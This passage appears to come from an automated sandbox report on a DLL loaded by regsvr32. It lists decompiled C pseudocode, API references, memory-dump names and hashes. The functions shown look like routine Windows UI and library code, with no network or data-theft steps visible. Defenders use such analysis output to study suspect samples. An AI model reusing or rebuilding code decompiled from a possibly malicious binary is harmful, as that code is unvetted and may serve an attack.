                                                                                                                0x10041e69
                                                                                                                0x10041e6b
                                                                                                                0x10041e6e
                                                                                                                0x10041e6f
                                                                                                                0x10041e6f
                                                                                                                0x10041e77
                                                                                                                0x10041e7c
                                                                                                                0x10041e7c
                                                                                                                0x10041e2d
                                                                                                                0x10041e2d
                                                                                                                0x10041e31
                                                                                                                0x10041e34
                                                                                                                0x10041e36
                                                                                                                0x10041e39
                                                                                                                0x10041e3a
                                                                                                                0x10041e3a
                                                                                                                0x10041e3f
                                                                                                                0x10041e41
                                                                                                                0x00000000
                                                                                                                0x10041e41
                                                                                                                0x10041dc8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10041dcf
                                                                                                                0x10041dd7
                                                                                                                0x00000000
                                                                                                                0x10041dde
                                                                                                                0x10041de4
                                                                                                                0x10041deb
                                                                                                                0x10041dfe
                                                                                                                0x10041e02
                                                                                                                0x10041e15
                                                                                                                0x10041e20
                                                                                                                0x10041e23
                                                                                                                0x00000000
                                                                                                                0x10041e23

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10041DA2
                                                                                                                • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 10041DFC
                                                                                                                • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 10041E13
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 10041E4D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePeek$H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 3998274959-0
                                                                                                                • Opcode ID: 1f76dbeb06708374ae703f7df48d55f204137604120caff3884b0899c8fdcaba
                                                                                                                • Instruction ID: ca689670030baaae4ba4fb0637ad45d80908a774964eb7643ea7462241452c8c
                                                                                                                • Opcode Fuzzy Hash: 1f76dbeb06708374ae703f7df48d55f204137604120caff3884b0899c8fdcaba
                                                                                                                • Instruction Fuzzy Hash: AD314B75A0074AEBDB20DFA5CD85E9EB7E8FF04344F610A29FA52E61C1D770AA40CB14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003887F Relevance: 6.1, APIs: 4, Instructions: 79windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E1003887F(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t31;
				intOrPtr _t36;
				long _t42;
				char* _t48;
				intOrPtr _t54;
				char* _t62;
				void* _t64;
				intOrPtr _t68;
				char* _t70;
				void* _t71;

				_t65 = __edi;
				_t64 = __edx;
				_push(8);
				E1004764D(0x10090d72, __ebx, __edi, __esi);
				_t68 = __ecx;
				_t31 =  *((intOrPtr*)(__ecx + 0x74));
				 *(_t71 - 0x14) = 0;
				if(( *(_t31 + 0x34) & 0x00080000) == 0 ||  *((intOrPtr*)(__ecx + 0x20)) == 0) {
					_t54 =  *((intOrPtr*)(_t68 + 0x1c4));
					__eflags = _t54;
					if(_t54 == 0) {
						__eflags =  *((intOrPtr*)(_t31 + 0x3a));
						if(__eflags == 0) {
							goto L10;
						} else {
							_t68 = _t31;
							goto L14;
						}
					} else {
						__eflags =  *((intOrPtr*)(_t54 + 0x3a));
						if(__eflags != 0) {
							_t68 = _t54;
							L14:
							_t36 = ( *(_t68 + 0x3a) & 0x0000ffff) +  *((intOrPtr*)(_t68 + 0x1c));
							__eflags = _t36;
							_push(_t36);
						} else {
							L10:
							_push(0x1009c448);
						}
					}
					E1000B543(0,  *((intOrPtr*)(_t71 + 8)), _t65, _t68, __eflags);
				} else {
					L1000140B(_t71 - 0x10, E100184C0());
					 *((intOrPtr*)(_t71 - 4)) = 0;
					 *(_t71 - 0x14) = L100011F4(_t71 - 0x10, 0x104);
					_t42 = SendMessageA( *(E10013FEA(0, _t71 - 0x10, _t71, GetParent( *(_t68 + 0x20))) + 0x20), 0x464, 0x104,  *(_t71 - 0x14));
					E1000FED3(_t71 - 0x10, 0xffffffff);
					if(_t42 < 0) {
						L7:
						L100011D1(_t71 - 0x10);
						L100010F5( *((intOrPtr*)(_t71 + 8)), __eflags, _t71 - 0x10);
						_t62 =  &(( *(_t71 - 0x10))[0xfffffffffffffff0]);
					} else {
						_t70 =  *(_t71 - 0x10);
						_t48 = PathFindExtensionA(_t70);
						if(_t48 == 0 ||  *_t48 != 0x2e) {
							goto L7;
						} else {
							_push( &(_t48[1]));
							E1000B543(0,  *((intOrPtr*)(_t71 + 8)), 0x104, _t70,  &(_t48[1]));
							_t62 = _t70 - 0x10;
						}
					}
					L100013E3(_t62, _t64);
				}
				return E10047725( *((intOrPtr*)(_t71 + 8)));
			}













                                                                                                                0x1003887f
                                                                                                                0x1003887f
                                                                                                                0x1003887f
                                                                                                                0x10038886
                                                                                                                0x1003888b
                                                                                                                0x1003888d
                                                                                                                0x10038899
                                                                                                                0x1003889c
                                                                                                                0x10038941
                                                                                                                0x10038947
                                                                                                                0x10038949
                                                                                                                0x1003895c
                                                                                                                0x10038960
                                                                                                                0x00000000
                                                                                                                0x10038962
                                                                                                                0x10038962
                                                                                                                0x00000000
                                                                                                                0x10038962
                                                                                                                0x1003894b
                                                                                                                0x1003894b
                                                                                                                0x1003894f
                                                                                                                0x10038958
                                                                                                                0x10038964
                                                                                                                0x10038968
                                                                                                                0x10038968
                                                                                                                0x1003896b
                                                                                                                0x10038951
                                                                                                                0x10038951
                                                                                                                0x10038951
                                                                                                                0x10038951
                                                                                                                0x1003894f
                                                                                                                0x1003896f
                                                                                                                0x100388ab
                                                                                                                0x100388b4
                                                                                                                0x100388c2
                                                                                                                0x100388cd
                                                                                                                0x100388e8
                                                                                                                0x100388f5
                                                                                                                0x100388fc
                                                                                                                0x10038925
                                                                                                                0x10038928
                                                                                                                0x10038934
                                                                                                                0x1003893c
                                                                                                                0x100388fe
                                                                                                                0x100388fe
                                                                                                                0x10038902
                                                                                                                0x1003890a
                                                                                                                0x00000000
                                                                                                                0x10038911
                                                                                                                0x10038915
                                                                                                                0x10038916
                                                                                                                0x1003891b
                                                                                                                0x1003891b
                                                                                                                0x1003890a
                                                                                                                0x1003891e
                                                                                                                0x1003891e
                                                                                                                0x1003897c

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10038886
                                                                                                                • GetParent.USER32(?), ref: 100388D0
                                                                                                                • SendMessageA.USER32 ref: 100388E8
                                                                                                                  • Part of subcall function 1000FED3: _strlen.LIBCMT ref: 1000FEE6
                                                                                                                • PathFindExtensionA.SHLWAPI(?), ref: 10038902
                                                                                                                  • Part of subcall function 1000B543: __EH_prolog3.LIBCMT ref: 1000B54A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3$ExtensionFindMessageParentPathSend_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 650063787-0
                                                                                                                • Opcode ID: ea741d1dcc3730a79ec89614de4668360d4dc39996ad634e460e8d42867bf0fe
                                                                                                                • Instruction ID: 2f896eae525bb4071195c68d8a2def441425b7df24b3d35e3c6fbc5014a471a2
                                                                                                                • Opcode Fuzzy Hash: ea741d1dcc3730a79ec89614de4668360d4dc39996ad634e460e8d42867bf0fe
                                                                                                                • Instruction Fuzzy Hash: E821CC758006469FDF21DFA0CC80ABE77B0FF05345B050AAEF552AB191DB30AA40CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001A795 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E1001A795(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t36;
				intOrPtr _t40;
				intOrPtr* _t44;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				intOrPtr _t54;
				void* _t59;
				intOrPtr* _t71;
				intOrPtr* _t73;
				void* _t75;
				void* _t76;

				_t76 = __eflags;
				_push(0x60);
				E10047680(0x1008ee52, __ebx, __edi, __esi);
				_t71 =  *((intOrPtr*)(_t75 + 8));
				_t73 =  *((intOrPtr*)(_t71 + 4));
				 *((intOrPtr*)(_t75 - 0x14)) = _t73;
				E100128F2(_t75 - 0x68, _t76);
				 *(_t75 - 4) = 0;
				 *(_t75 - 4) = 1;
				 *((intOrPtr*)(E1001DD4F(0, _t71, _t73, _t76) + 4)) =  *((intOrPtr*)( *_t71 + 4));
				_t36 = E1001E302(0, _t71, _t73, _t76);
				_t9 = _t36 + 0x74; // 0x74
				 *((intOrPtr*)(_t73 + 0x1c)) = _t36;
				 *((intOrPtr*)(E1001988F(0, _t9, _t71, _t73, _t76) + 4)) = _t73;
				E1001A66C(_t73, _t76);
				_t40 =  *((intOrPtr*)(E1001E302(0, _t71, _t73, _t76) + 4));
				if(_t40 != 0 &&  *((intOrPtr*)(_t73 + 0x20)) == 0) {
					_t54 =  *((intOrPtr*)(_t40 + 0x20));
					if(_t54 != 0 &&  *((intOrPtr*)(_t54 + 0x20)) != 0) {
						E1001402B(_t75 - 0x68, _t75,  *((intOrPtr*)(_t54 + 0x20)));
						 *((intOrPtr*)(_t73 + 0x20)) = _t75 - 0x68;
					}
				}
				 *(_t75 - 4) = 0;
				_t59 =  *(_t71 + 0x14);
				SetEvent( *(_t71 + 0x10));
				WaitForSingleObject(_t59, 0xffffffff);
				CloseHandle(_t59);
				_t44 =  *((intOrPtr*)(_t73 + 0x38));
				_t81 = _t44;
				if(_t44 == 0) {
					_t46 =  *((intOrPtr*)( *_t73 + 0x50))();
					__eflags = _t46;
					_t47 =  *_t73;
					if(_t46 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x54))();
					} else {
						_t48 =  *((intOrPtr*)(_t47 + 0x68))();
					}
				} else {
					_t48 =  *_t44( *((intOrPtr*)(_t73 + 0x34)));
				}
				E10014064(_t59, _t75 - 0x68);
				_push(1);
				E1001A36D(_t75 - 0x68, _t81, _t48);
				 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
				E10014A18(_t59, _t75 - 0x68, _t71, _t48, _t81);
				return E10047725(0);
			}















                                                                                                                0x1001a795
                                                                                                                0x1001a795
                                                                                                                0x1001a79c
                                                                                                                0x1001a7a1
                                                                                                                0x1001a7a4
                                                                                                                0x1001a7aa
                                                                                                                0x1001a7ad
                                                                                                                0x1001a7b4
                                                                                                                0x1001a7b7
                                                                                                                0x1001a7c5
                                                                                                                0x1001a7c8
                                                                                                                0x1001a7cd
                                                                                                                0x1001a7d0
                                                                                                                0x1001a7d8
                                                                                                                0x1001a7db
                                                                                                                0x1001a7e5
                                                                                                                0x1001a7ea
                                                                                                                0x1001a7f1
                                                                                                                0x1001a7f6
                                                                                                                0x1001a803
                                                                                                                0x1001a80b
                                                                                                                0x1001a80b
                                                                                                                0x1001a7f6
                                                                                                                0x1001a80e
                                                                                                                0x1001a846
                                                                                                                0x1001a849
                                                                                                                0x1001a852
                                                                                                                0x1001a859
                                                                                                                0x1001a85f
                                                                                                                0x1001a862
                                                                                                                0x1001a864
                                                                                                                0x1001a872
                                                                                                                0x1001a875
                                                                                                                0x1001a877
                                                                                                                0x1001a87b
                                                                                                                0x1001a882
                                                                                                                0x1001a87d
                                                                                                                0x1001a87d
                                                                                                                0x1001a87d
                                                                                                                0x1001a866
                                                                                                                0x1001a869
                                                                                                                0x1001a86b
                                                                                                                0x1001a88a
                                                                                                                0x1001a88f
                                                                                                                0x1001a892
                                                                                                                0x1001a897
                                                                                                                0x1001a89e
                                                                                                                0x1001a8aa

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1001A79C
                                                                                                                  • Part of subcall function 1001A66C: GetCurrentThreadId.KERNEL32 ref: 1001A67F
                                                                                                                  • Part of subcall function 1001A66C: SetWindowsHookExA.USER32(000000FF,V$>,00000000,00000000), ref: 1001A68F
                                                                                                                • SetEvent.KERNEL32(?,00000060), ref: 1001A849
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1001A852
                                                                                                                • CloseHandle.KERNEL32(?), ref: 1001A859
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 1532457625-0
                                                                                                                • Opcode ID: d45ea3b7feff309df0efdf8f229d8945ca831929a4a26ca04bef5c0179c09f7d
                                                                                                                • Instruction ID: 48ee8a3e715e40a45da55d585f65e9619b2ee3e199d2fb2f7ec349d750b1c6e6
                                                                                                                • Opcode Fuzzy Hash: d45ea3b7feff309df0efdf8f229d8945ca831929a4a26ca04bef5c0179c09f7d
                                                                                                                • Instruction Fuzzy Hash: 8F314C74900645DFCB14EFA0C68594DBBF1FF09300B524569E1569B2A2DF30EAC5CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002AC09 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 20%
                                                                                                                			E1002AC09(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __esi, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v264;
				void* __edi;
				signed int _t11;
				signed int _t14;
				void* _t16;
				char _t19;
				signed int _t22;
				intOrPtr _t23;
				signed int* _t34;
				CHAR* _t36;
				signed int _t37;

				_t35 = __esi;
				_t26 = __ebx;
				_t11 =  *0x100b9e70; // 0xbb35530
				_v8 = _t11 ^ _t37;
				_t34 = _a8;
				_push(0x100);
				_t33 =  &_v264;
				_push( &_v264);
				_push(_a4);
				_t14 =  *((intOrPtr*)( *__ecx + 0x7c))();
				if(_t14 != 0) {
					_push(__ebx);
					_push(__esi);
					_t36 =  &_v264;
					_t16 = E1004DD3B(_v264 & 0x000000ff);
					while(_t16 != 0) {
						_t36 = CharNextA(_t36);
						_t16 = E1004DD3B( *_t36 & 0x000000ff);
					}
					_t19 =  *_t36;
					if(_t19 == 0x2b || _t19 == 0x2d) {
						_t36 = CharNextA(_t36);
					}
					_t22 = E1004DC6B( *_t36 & 0x000000ff);
					_pop(_t35);
					_pop(_t26);
					if(_t34 != 0) {
						 *_t34 = _t22;
					}
					if(_t22 == 0) {
						L3:
						_t23 = 0;
						goto L17;
					} else {
						_push(0xa);
						_push(0);
						_push( &_v264);
						if(_a12 == 0) {
							_t23 = E1004DB61();
						} else {
							_t23 = E1004DB1D();
						}
						L17:
						return E1004763E(_t23, _t26, _v8 ^ _t37, _t33, _t34, _t35);
					}
				}
				if(_t34 != 0) {
					 *_t34 =  *_t34 & _t14;
				}
				goto L3;
			}















                                                                                                                0x1002ac09
                                                                                                                0x1002ac09
                                                                                                                0x1002ac12
                                                                                                                0x1002ac19
                                                                                                                0x1002ac1f
                                                                                                                0x1002ac22
                                                                                                                0x1002ac27
                                                                                                                0x1002ac2d
                                                                                                                0x1002ac2e
                                                                                                                0x1002ac31
                                                                                                                0x1002ac36
                                                                                                                0x1002ac49
                                                                                                                0x1002ac4a
                                                                                                                0x1002ac4c
                                                                                                                0x1002ac52
                                                                                                                0x1002ac6d
                                                                                                                0x1002ac62
                                                                                                                0x1002ac68
                                                                                                                0x1002ac68
                                                                                                                0x1002ac72
                                                                                                                0x1002ac76
                                                                                                                0x1002ac7f
                                                                                                                0x1002ac7f
                                                                                                                0x1002ac85
                                                                                                                0x1002ac8d
                                                                                                                0x1002ac8e
                                                                                                                0x1002ac8f
                                                                                                                0x1002ac91
                                                                                                                0x1002ac91
                                                                                                                0x1002ac95
                                                                                                                0x1002ac3e
                                                                                                                0x1002ac3e
                                                                                                                0x00000000
                                                                                                                0x1002ac97
                                                                                                                0x1002ac9b
                                                                                                                0x1002aca3
                                                                                                                0x1002aca5
                                                                                                                0x1002aca6
                                                                                                                0x1002acaf
                                                                                                                0x1002aca8
                                                                                                                0x1002aca8
                                                                                                                0x1002aca8
                                                                                                                0x1002acb7
                                                                                                                0x1002acc3
                                                                                                                0x1002acc3
                                                                                                                0x1002ac95
                                                                                                                0x1002ac3a
                                                                                                                0x1002ac3c
                                                                                                                0x1002ac3c
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • CharNextA.USER32(?), ref: 1002AC60
                                                                                                                  • Part of subcall function 1004DD3B: __ismbcspace_l.LIBCMT ref: 1004DD41
                                                                                                                • CharNextA.USER32(00000000), ref: 1002AC7D
                                                                                                                • _strtol.LIBCMT ref: 1002ACA8
                                                                                                                • _strtoul.LIBCMT ref: 1002ACAF
                                                                                                                  • Part of subcall function 1004DB61: strtoxl.LIBCMT ref: 1004DB81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                • String ID:
                                                                                                                • API String ID: 4211061542-0
                                                                                                                • Opcode ID: 11e979e455144ecb99cc4bd97b1e4237e4f76c46ac494c7ec6bbabd890d30392
                                                                                                                • Instruction ID: a10ca92737466be798e339b43ed86d3508cd612b3bd6a436f2c12da44ef0d25b
                                                                                                                • Opcode Fuzzy Hash: 11e979e455144ecb99cc4bd97b1e4237e4f76c46ac494c7ec6bbabd890d30392
                                                                                                                • Instruction Fuzzy Hash: 482124729002559BCB10DB749C81BAA77E8EF0A380FB200A6F980D7140DF74ED818BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100304E5 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E100304E5(signed int _a4, signed int _a8, intOrPtr _a12) {
				void* _t15;
				signed int _t17;
				void* _t18;
				void* _t19;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t15;
				}
				_t23 = _a4;
				if((_t23 & 0x00002000) == 0) {
					_t17 = (_t23 & 0x0000ffff) - 8;
					if(_t17 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t17;
					}
					_t18 = _t17 - 1;
					if(_t18 == 0) {
						L13:
						_t17 =  *_t31;
						if(_t17 == 0) {
							goto L17;
						}
						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
						goto L16;
					}
					_t17 = _t18 - 3;
					if(_t17 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t19 = _t17 - 1;
					if(_t19 == 0) {
						goto L13;
					} else {
						_t17 = _t19 - 0x7b;
						if(_t17 == 0) {
							E1003045C( &_a8, _a12);
							_t17 = _a8;
							if(_t17 != 0) {
								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
								_t17 = _a8;
								if(_t17 != 0) {
									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
								}
							}
						}
						goto L17;
					}
				}
				_t17 =  *_t31;
				if(_t17 == 0) {
					goto L17;
				} else {
					__imp__#16(_t17);
					goto L16;
				}
			}









                                                                                                                0x100304e9
                                                                                                                0x100304ee
                                                                                                                0x10030592
                                                                                                                0x10030592
                                                                                                                0x100304f5
                                                                                                                0x100304fd
                                                                                                                0x10030511
                                                                                                                0x10030514
                                                                                                                0x1003056a
                                                                                                                0x10030570
                                                                                                                0x10030570
                                                                                                                0x10030573
                                                                                                                0x10030578
                                                                                                                0x10030589
                                                                                                                0x10030589
                                                                                                                0x00000000
                                                                                                                0x1003058f
                                                                                                                0x10030516
                                                                                                                0x10030517
                                                                                                                0x1003055a
                                                                                                                0x1003055a
                                                                                                                0x1003055e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10030563
                                                                                                                0x00000000
                                                                                                                0x10030563
                                                                                                                0x10030519
                                                                                                                0x1003051c
                                                                                                                0x10030552
                                                                                                                0x00000000
                                                                                                                0x10030552
                                                                                                                0x1003051e
                                                                                                                0x1003051f
                                                                                                                0x00000000
                                                                                                                0x10030521
                                                                                                                0x10030521
                                                                                                                0x10030524
                                                                                                                0x1003052c
                                                                                                                0x10030531
                                                                                                                0x10030536
                                                                                                                0x1003053f
                                                                                                                0x10030542
                                                                                                                0x10030547
                                                                                                                0x1003054c
                                                                                                                0x1003054c
                                                                                                                0x10030547
                                                                                                                0x10030536
                                                                                                                0x00000000
                                                                                                                0x10030524
                                                                                                                0x1003051f
                                                                                                                0x100304ff
                                                                                                                0x10030503
                                                                                                                0x00000000
                                                                                                                0x10030505
                                                                                                                0x10030506
                                                                                                                0x00000000
                                                                                                                0x10030506

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArrayDestroyFreeSafeTask
                                                                                                                • String ID:
                                                                                                                • API String ID: 3253174383-0
                                                                                                                • Opcode ID: 3c05bb5cf828d95ea5652f18c5bee6f27d9f082fd4a6a051cf433a8da4a67cf7
                                                                                                                • Instruction ID: 232c6462cfe77b3f68e9394470469af20e96d9e67133cfd8b3867fd55f94526e
                                                                                                                • Opcode Fuzzy Hash: 3c05bb5cf828d95ea5652f18c5bee6f27d9f082fd4a6a051cf433a8da4a67cf7
                                                                                                                • Instruction Fuzzy Hash: 73114A31A02A069FDB56CF65C8A8BAB7BE8EF017D2F104418F945CE1A0CB35DA00DE58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100423B4 Relevance: 6.1, APIs: 4, Instructions: 63windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E100423B4(void* __ebx, void* __edi, void* __eflags) {
				void* __ecx;
				void* __esi;
				void* _t12;
				void* _t20;
				void* _t27;
				intOrPtr _t30;
				void* _t36;
				intOrPtr _t39;
				void* _t40;
				void* _t43;
				void* _t44;

				_t36 = __edi;
				_t27 = __ebx;
				_t39 = _t30;
				 *((intOrPtr*)(_t44 + 4)) = _t39;
				_t12 = E10013F46(__ebx, _t30, __edi, __eflags);
				if(_t12 != 0) {
					if((E100177F8(_t39) & 0x00000100) != 0) {
						_t32 = _t39;
						_t43 = E10015912(__ebx, _t39, __edi);
						_t48 = _t43;
						if(_t43 == 0) {
							E1000A069(__ebx, _t32, __edi, _t39, _t48);
						}
						_push(_t27);
						_push(_t36);
						_t40 = E10013FEA(_t27, _t32, _t43, GetForegroundWindow());
						if(_t43 == _t40 || E10013FEA(0x36d, _t32, _t43, GetLastActivePopup( *(_t43 + 0x20))) == _t40 && SendMessageA( *(_t40 + 0x20), 0x36d, 0x40, 0) != 0) {
							_t20 = 1;
